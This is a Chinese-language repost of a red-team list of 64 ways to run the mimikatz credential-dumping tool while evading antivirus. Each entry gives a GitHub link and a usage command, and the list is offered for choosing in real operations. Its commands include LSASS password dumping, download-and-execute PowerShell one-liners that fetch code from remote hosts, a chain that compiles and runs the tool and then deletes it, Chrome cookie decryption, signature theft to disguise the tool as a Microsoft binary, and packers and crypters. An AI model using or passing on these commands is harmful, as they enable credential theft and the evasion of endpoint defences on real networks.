64种运行mimikatz的方法（含Bypass）

From:https://redteamrecipe.com/64-Methods-For-Execute-Mimikatz/

里面包含一些免杀的方法，在实际情况中按需选择。

go-mimikatz

go build

https://github.com/vyrus001/go-mimikatz

Rusty Mimikatz

cargo build --release

https://github.com/memN0ps/mimikatz-rs

MimikatzFUD

.\Invoke-M1m1fud2.ps1

https://github.com/HernanRodriguez1/MimikatzFUD

pypykatz

pip install -r requirements.txt

https://github.com/skelsec/pypykatz

BetterSafetyKatz

.\BetterSafetyKatz.exe --DumpCreds

https://github.com/Flangvik/BetterSafetyKatz

CopyCat

.\CopyCat.exe --dump --local

https://github.com/mobdk/CopyCat

PyFuscation

python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1

https://github.com/CBHue/PyFuscation

Invoke-Cats

Invoke-Cats -pwds

https://github.com/DanMcInerney/Invoke-Cats

WinBoost

csc.exe /platform:x64 /target:exe /unsafe winboost.cs

https://github.com/mobdk/WinBoost

mimidogz

.\Invoke-Mimidogz.ps1

https://github.com/fir3d0g/mimidogz

CoreClass

"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.

https://github.com/mobdk/CoreClass

SharpMimikatz

SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

https://github.com/XTeam-Wing/SharpMimikatz

Invoke-Obfuscation

Set-ExecutionPolicy Unrestricted

https://github.com/danielbohannon/Invoke-Obfuscation

SimpleMimikatzObfuscator

Commands.txt

https://github.com/DimopoulosElias/SimpleMimikatzObfuscator

ClickOnceKatz

pip install pycryptodome requests

https://github.com/sinmygit/ClickOnceKatz

pymemimporter

import base64

https://github.com/n1nj4sec/pymemimporter

SharpDPAPI

dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj

https://github.com/GhostPack/SharpDPAPI

Plog

privilege::debug

https://github.com/GamehunterKaan/Plog

StegoKatz

.\StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>

https://github.com/r13mann/StegoKatz

LoadMimikatzWithDinvoke.cs

mimi.bat

https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs

mimikatz-bypass

Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1

https://github.com/corneacristian/mimikatz-bypass

Utils

dotnet build -r win10-x64

https://github.com/ITh4cker/Utils

Eyeworm

python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE>

https://github.com/imsellbaox/Eyeworm

drunkenkatz

beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"

https://github.com/ap3r/drunkenkatz

CallBack

python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>

https://github.com/mobdk/CallBack

mimikatz-byPass-Huorong

python mimikatz_byPass_Huorong.py

https://github.com/q1ya/mimikatz-byPass-Huorong

mimikatz_bypass

python mimikatz_bypass.py

https://github.com/wangfly-me/mimikatz\_bypass

HTML-mimikatz-

cmd.exe mimikatz.html

https://github.com/vipserver/HTML-mimikatz-

Mimikatz.exe-in-JS

cmd.exe mimikatz.js

https://github.com/hardw00t/Mimikatz.exe-in-JS

-Have-You-Seen-These-Katz-

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1

https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-

MimiRunner

rundll32 *.log,#1

https://github.com/mobdk/MimiRunner

Mimikatz-PE-Injection

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

https://github.com/analyticsearch/Mimikatz-PE-Injection

ninifox

.\Invoke-NiNifox.ps1

https://github.com/scottjosh/ninifox

Chexport

dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect`

https://github.com/GamehunterKaan/Chexport

mimik

mimikatz.exe

https://github.com/MisterLobster22/mimik

my-obfuscated-mimikatz

eric.ps1

https://github.com/lazaars/my-obfuscated-mimikatz

Invoke-Mimikatz-W10

.\Invoke-Mimikatz.ps1

https://github.com/VDA-Labs/Invoke-Mimikatz-W10

MimiVader

python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py

https://github.com/lawja/MimiVader

Invoke-Mimikatz

.\Invoke-Mimikatz

https://github.com/syn-ack-zack/Invoke-Mimikatz

Invoke-Mimikatz

.\invokemimikatz.ps1

https://github.com/dfirdeferred/Invoke-Mimikatz

mimikatz_bypass

.\XInvoke-Mimikatz.ps1

https://github.com/izj007/mimikatz\_bypass

JS_MimiKatzDropper

cscript.exe dropper.js

https://github.com/leinn32/JS\_MimiKatzDropper

mimicats

Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1') Invoke-Cats -Command '"privilege::debug"'

https://github.com/Moon1705/mimicats

XorPacker

python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED

https://github.com/tmenochet/XorPacker

PEzor

PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'

https://github.com/phra/PEzor

AtomPePacker

PePacker.exe mimikatz.exe -e

https://github.com/NUL0x4C/AtomPePacker

Nim-RunPE

nim c -d:args NimRunPE.nim

https://github.com/S3cur3Th1sSh1t/Nim-RunPE

Nimcrypt2

nim c -d:release nimcrypt2.nim

https://github.com/icyguider/Nimcrypt2

ProtectMyTooling

py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

https://github.com/mgeeky/ProtectMyTooling

xencrypt

Import-Module ./xencrypt.ps1

https://github.com/the-xentropy/xencrypt

BetterXencrypt

Import-Module ./betterxencrypt.ps1

https://github.com/GetRektBoy724/BetterXencrypt

AES-Encoder

Invoke-AES-Encoder -InFile

https://github.com/Chainski/AES-Encoder

mortar

./encryptor -f mimikatz.exe -o bin.enc

https://github.com/0xsp-SRD/mortar

.NET-Crypter

Browse Executable:

https://github.com/roast247/.NET-Crypter

Custom mods + Invoke-Obfuscation

sed

https://github.com/newlog/fud\_mimikatz\_talk

Obfuscated_Invoke-Mimikatz

sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1

https://github.com/VraiHack/Obfuscated\_Invoke-Mimikatz

mimikatz_encoded

certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/mobx26/mimikatz\_encoded

Encrypted_Mimikatz

.\decrypt.ps1

https://github.com/Sombody101/Encrypted\_Mimikatz

SigThief

sigthief.py -i c: \Windows\System32\consent.exe -t mimikatz. exe -o MSCredentialTool.exe

https://github.com/secretsquirrel/SigThief

memory+suspended

#include <stdio.h>

XOR’d with 0xFF

#include <iostream>

XORing each character with the value 0xAA

#include <stdio.h>

Decoding and storing it in memory

#include <iostream>

Inject and execute Mimikatz in memory

#include <windows.h>

长亭百川云 - 文章详情

长亭百川云

长亭百川云 - 文章详情

长亭百川云

64种运行mimikatz的方法（含Bypass）